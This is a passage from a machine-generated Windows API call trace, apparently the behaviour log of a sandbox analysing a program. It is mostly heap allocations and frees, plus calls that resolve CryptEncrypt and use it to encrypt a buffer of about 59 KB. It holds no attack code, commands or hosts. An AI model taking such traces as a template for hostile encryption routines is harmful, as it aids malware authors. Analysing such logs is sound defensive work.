hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa550, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.522] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.523] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xe924, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xe928) returned 1 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.527] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.527] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.527] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.527] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.528] CharLowerBuffW (in: lpsz="byte[59688]", cchLength=0xb | out: lpsz="byte[59688]") returned 0xb [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.528] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0164.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0164.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.530] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.530] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.530] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0164.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.531] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c2258*, pdwDataLen=0x8bef68*=0xe924, dwBufLen=0xe928 | out: pbData=0x34c2258*, pdwDataLen=0x8bef68*=0xe928) returned 1 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0164.532] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0164.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 